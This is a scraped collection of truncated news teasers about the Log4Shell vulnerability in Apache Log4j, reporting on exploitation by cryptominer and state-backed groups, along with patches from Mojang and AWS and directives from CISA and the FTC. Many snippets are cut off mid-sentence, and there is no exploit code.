Most of the attacks focus on cryptocurrency mining done on victims’ dimes, as seen by Sophos, Microsoft and other security firms. However, attackers are actively trying to install far more dangerous malware on vulnerable systems as well.
According to Micros...
Get our weekly newsletter This might be the bug that deserves the website, logo and book deal
Miscreants are wasting no time in using the widespread Log4j vulnerability to compromise systems, with waves and waves of live exploit attempts focused mainly – for now – on turning infected devices into cryptocurrency-mining botnet drones.
Israel's Check Point said this morning it was seeing around 100 exploit attempts every minute, going into further detail in a blog post.
Apache Log4j is an open-source logging utility written in Java that is used all over the world in many sof...
An excruciating, easily exploited flaw in the ubiquitous Java logging library Apache Log4j could allow unauthenticated remote code execution (RCE) and complete server takeover — and it’s being exploited in the wild.
The flaw first turned up on sites that cater to users of the world’s favorite game, Minecraft, on Thursday. The sites reportedly warned that attackers could unleash malicious code on either servers or clients running the Java version of Minecraft by manipulating log messa...
Proof-of-concept exploits for a critical zero-day vulnerability in the ubiquitous Apache Log4j Java-based logging library are currently being shared online, exposing home users and enterprises alike to remote code execution attacks.
is developed by the Apache Foundation and is widely used by both enterprise apps and cloud services.
Thus, while home users might have moved on from Java, anything from enterprise software to cloud software such as Apple's iCloud and Steam is likely vuln...
Swedish video game developer Mojang Studios has released an emergency Minecraft security update to address a critical bug in the Apache Log4j Java logging library used by the game's Java Edition client and multiplayer servers.
The vulnerability is fixed with the release of
, which is now rolling out to all customers.
"This release fixes a critical security issue for multiplayer servers, changes how the world fog works to make more of the world visible, and fixes a couple of ...
Get our weekly newsletter Prepare to have a very busy weekend of mitigating and patching
An unauthenticated remote code execution vulnerability in Apache's Log4j Java-based logging tool is being actively exploited, researchers have warned after it was used to execute code on Minecraft servers.
Infosec firm Randori summarised the vuln in a blog post, saying: "Effectively, any scenario that allows a remote connection to supply arbitrary data that is written to log files by an application utilizing the Log4j library is susceptible to exploitation."
Crafted proof-of-concept ...
Get our weekly newsletter Miscreants deployed cryptominers, backdoors since late December, Sophos says
VMware's Horizon virtualization platform has become an ongoing target of attackers exploiting the high-profile Log4j flaw to install backdoors and cryptomining malware.
In a report this week, cybersecurity firm Sophos wrote that VMware's virtual desktop and applications platform has been in the crosshairs since late December, with the largest wave of attacks beginning Jan. 19 and continuing well into March. Many of the attacks are designed to deploy cryptocurrency mining malware, Sophos re...
Topics Security Off-Prem On-Prem Software Offbeat Vendor Voice Vendor Voice Resources Here’s how Wiz can help
Sponsored Feature When software vulnerabilities and zero days moved up the enterprise worry list 15 years ago, nobody imagined the world would one day end up with a threat as perplexing as Log4Shell – a vulnerability in the Apache Log4j open source logging framework that's used in software on all major operating systems spanning everything from cloud services to PC games.
In what might be called the happier days of the past, flaws were something that affected single applications and indi...
Topics Security Off-Prem On-Prem Software Offbeat Vendor Voice Vendor Voice Resources Malicious cyber actors go after 2021's biggest misses, spend less time on the classics
Security flaws in Log4j, Microsoft Exchange, and Atlassian's workspace collaboration software were among the bugs most frequently exploited by "malicious cyber actors" in 2021 , according to a joint advisory by the Five Eyes nations' cybersecurity and law enforcement agencies.
It's worth noting that 11 of the 15 flaws on the list were disclosed in 2021, as previous years' lists often found miscreants exploiting the older vulns for which patches had been available for years.
Of course...
Everyone's heard of the critical log4j zero-day by now. Dubbed 'Log4Shell' and 'Logjam,' the vulnerability has set the internet on fire.
Thus far, the log4j vulnerability, tracked as CVE-2021-44228, has been abused by all kinds of threat actors from
to
and others to
on vulnerable systems.
Log4j usage is rampant among many software products and multiple
have since surfaced. And, it now seems, 'logback' isn't all that immune either.
Below...
Amazon Web Services (AWS) has fixed four security issues in its hot patch from December that addressed the critical Log4Shell vulnerability (CVE-2021-44228) affecting cloud or on-premise environments running Java applications with a vulnerable version of the Log4j logging library or containers.
The hot patch packages from Amazon are not exclusive to AWS resources and allowed escaping a container in the environment and taking control of the host. The flaws could als...
US Federal Civilian Executive Branch agencies have been ordered to patch the critical and actively exploited Log4Shell security vulnerability in the Apache Log4j library within the next six days.
The order comes through an emergency directive issued by the Cybersecurity and Infrastructure Security Agency (CISA) today.
This is not surprising given the risk the ongoing exploitation of this vulnerability poses and seeing that the security flaw (tracked as CVE-2021-44228) has also
The US Federal Trade Commission (FTC) has warned today that it will go after any US company that fails to protect its customers' data against ongoing Log4J attacks.
"The FTC intends to use its full legal authority to pursue companies that fail to take reasonable steps to protect consumer data from exposure as a result of Log4j, or similar known vulnerabilities in the future," the US government agency
.
"The duty to take reasonable steps to mitigate known software vulnerabilit...
US Federal Civilian Executive Branch agencies have been ordered to patch the critical and actively exploited Log4Shell security vulnerability in the Apache Log4j library within the next six days.
The order comes through an emergency directive issued by the Cybersecurity and Infrastructure Security Agency (CISA) today.
This is not surprising given the risk the ongoing exploitation of this vulnerability poses and seeing that the security flaw (tracked as CVE-2021-44228) has also
Hackers believed to be part of the Iranian APT35 state-backed group (aka 'Charming Kitten' or 'Phosphorus') has been observed leveraging Log4Shell attacks to drop a new PowerShell backdoor.
The modular payload can handle C2 communications, perform system enumeration, and eventually receive, decrypt, and load additional modules.
Log4Shell is an exploit for CVE-2021-44228, a critical remote code execution vulnerability in Apache Log4j disclosed in December.
According to research...
The Log4Shell vulnerabilities in the widely used Log4j software are still leveraged by threat actors today to deploy various malware payloads, including recruiting devices into DDoS botnets and for planting cryptominers.
According to a report by Barracuda, the past couple of months were characterized by dips and spikes in the targeting of Log4Shell, but the volume of exploitation attempts has remained relatively constant.
After analyzing these attacks, Barracuda determined that ...
The Cybersecurity and Infrastructure Security Agency (CISA) has ordered federal agencies to patch systems against the critical Log4Shell vulnerability and released mitigation guidance in response to active exploitation.
This follows threat actors' head start in scanning for and
to deploy malware.
Even though Apache quickly released a patch to address the maximum severity remote code execution flaw (CVE-2021-44228)
, it only happened after attackers began deploying the ...
The Cybersecurity and Infrastructure Security Agency (CISA) has
the release of a scanner for identifying web services impacted by two Apache Log4j remote code execution vulnerabilities, tracked as CVE-2021-44228 and CVE-2021-45046.
"log4j-scanner is a project derived from other members of the open-source community by CISA's Rapid Action Force team to help organizations identify potentially vulnerable web services affected by the log4j vulnerabilities," the cybersecurity agency
The North Korean hacking group known as Lazarus is exploiting the Log4J remote code execution vulnerability to inject backdoors that fetch information-stealing payloads on VMware Horizon servers.
The vulnerability is tracked as CVE-2021-44228, aka
, and impacts many products, including VMware Horizon.
The exploitation of vulnerable Horizon deployments
, but many admins are yet to apply the available security updates.
According to a report published by analyst...
Hackers are targeting Russian government agencies with phishing emails that pretend to be Windows security updates and other lures to install remote access malware.
The attacks are being conducted by a previously undetected APT (advanced persistent threat) group believed to be operating from China, who are linked to four separate spear-phishing campaigns.
These operations spanned between February and April 2022, coinciding with the Russian invasion of Ukraine. Its targets have been g...
Get our weekly newsletter Plus: Ransomware gangster sentenced, Dell patches more Log4j bugs, and cartoon apes gone bad
In Brief Triton malware remains a threat to the global energy sector, according to an FBI warning.
Triton is the software nasty used in a 2017 cyber attack carried out by a Russian government-backed research institution against a Middle East petrochemical facility.
The new FBI warning [PDF] came a day after the US Department of Justice unsealed a pair of indictments that detail alleged Russian government efforts to use supply chain attacks and malware in an attempt to compromise and ...